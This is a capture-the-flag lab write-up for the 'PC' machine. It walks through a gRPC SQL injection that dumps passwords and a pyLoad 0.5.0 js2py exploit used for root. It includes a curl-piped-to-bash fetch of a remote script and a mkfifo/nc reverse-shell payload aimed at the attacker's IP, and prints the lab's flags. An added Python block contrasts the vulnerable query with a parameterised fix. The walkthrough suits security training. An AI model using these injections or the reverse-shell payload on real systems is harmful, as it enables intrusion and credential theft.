[Meachines] [Easy] PC: gRPC HTTP/2 SQLi + KTOR HTTP scan + pyLoad 0.5.0 js2py abuse for privilege escalation

Published: 2025-02-22

Information Gathering

IP Address      Open Ports
10.10.11.214    TCP: 22, 50051

$ ip='10.10.11.214'; itf='tun0'
$ if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
      | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
      echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
      nmap -Pn -sV -sC -p "$ports" "$ip"
    else
      echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
  else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
  fi

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91bf44edea1e3224301f532cea71e5ef (RSA)
|   256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_  256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open  unknown

gRPC HTTP/2 SQLi

https://github.com/fullstorydev/grpcurl/releases/latest/download/grpcurl_1.9.2_linux_x86_64.tar.gz

$ grpcurl -plaintext 10.10.11.214:50051 list

$ grpcurl -plaintext 10.10.11.214:50051 list SimpleApp

$ grpcurl -plaintext 10.10.11.214:50051 describe SimpleApp

$ grpcurl -plaintext 10.10.11.214:50051 describe LoginUserRequest

$ grpcurl -plaintext 10.10.11.214:50051 describe getInfoRequest
Request parameters

Register a user

$ grpcurl -plaintext -d '{"username":"maps","password":"maps"}' 10.10.11.214:50051 SimpleApp.RegisterUser

$ grpcurl -plaintext -vv -d '{"username":"maps","password":"maps"}' 10.10.11.214:50051 SimpleApp.LoginUser

token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg2MzQyOX0.CHbQPJZifCuzIQ7IzTJlN8BYd9T4SStEwEL4ygJpygM'

$ grpcurl -plaintext -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg2MzQyOX0.CHbQPJZifCuzIQ7IzTJlN8BYd9T4SStEwEL4ygJpygM' -d '{"id": "-1 union select 2-- -"}' 10.10.11.214:50051 SimpleApp.getInfo

$ grpcurl -plaintext -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg5NTYyNn0.ad2gHY5jP89gKHHTwRndAV_vC3nLAW48qNNGBs5SSxY' -d '{"id": "-1 UNION SELECT GROUP_CONCAT(username || password) FROM accounts;--"}' 10.10.11.214:50051 SimpleApp.getInfo

HereIsYourPassWord1431
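
The getInfo injection above works because the `id` field is spliced into the SQL text. As an added example (not the box's own code), here is the assumed vulnerable pattern run against a constructed in-memory SQLite copy of the `messages`/`accounts` tables, beside a hardened version that validates the value and binds it as a parameter; table contents and the message text are constructed.

```python
import sqlite3

# Constructed stand-ins for the box's tables; the real contents are not on the page.
SAMPLE_MESSAGE = "constructed message for id 1"
SAMPLE_ACCOUNTS = [("admin", "constructed-admin-pw"), ("sau", "constructed-sau-pw")]


def make_db():
    """Build an in-memory SQLite database shaped like the getInfo backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, message TEXT)")
    conn.execute("INSERT INTO messages VALUES (1, ?)", (SAMPLE_MESSAGE,))
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return conn


def get_info_vulnerable(conn, id_value):
    """Assumed vulnerable pattern: the gRPC `id` string is spliced into the SQL text.

    Everything after the number is executed as SQL, so a UNION SELECT against
    `accounts` comes back in place of the message.
    """
    query = f"SELECT message FROM messages WHERE id = {id_value}"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def get_info_safe(conn, id_value):
    """Hardened form: reject non-integers, then bind the value as a parameter.

    The injected payloads fail int() and never reach the SQL engine; a bound
    integer cannot change the query structure either.
    """
    try:
        id_int = int(id_value)
    except (TypeError, ValueError):
        return None
    row = conn.execute(
        "SELECT message FROM messages WHERE id = ?", (id_int,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    leak = "-1 UNION SELECT GROUP_CONCAT(username || password) FROM accounts;--"
    print("vulnerable:", get_info_vulnerable(db, leak))  # dumps the accounts table
    print("hardened:  ", get_info_safe(db, leak))        # None
```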

$ ssh sau@10.10.11.214

User.txt

853046f61d1950319e09a0664f03abc6

Privilege Escalation: pyLoad 0.5.0 js2py Abuse

https://github.com/MartinxMax/KTOR/blob/main/ktor.sh

$ curl http://10.10.16.24/ktor.sh|bash -s -- -l -p all

$ ssh -f -N -L 8000:127.0.0.1:8000 -L 9666:127.0.0.1:9666 sau@10.10.11.214

http://127.0.0.1:8000/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F

$ ps aux | grep pyload

https://huntr.com/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65

$ curl -i -s -k -X POST \
--data-binary "jk=pyimport%20os;os.system(\"rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.24%201234%20%3E%2Ftmp%2Ff\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa" \
"http://localhost:8000/flash/addcrypted2"

Root.txt

6c032585f46aad66f4762f8f95e59fe1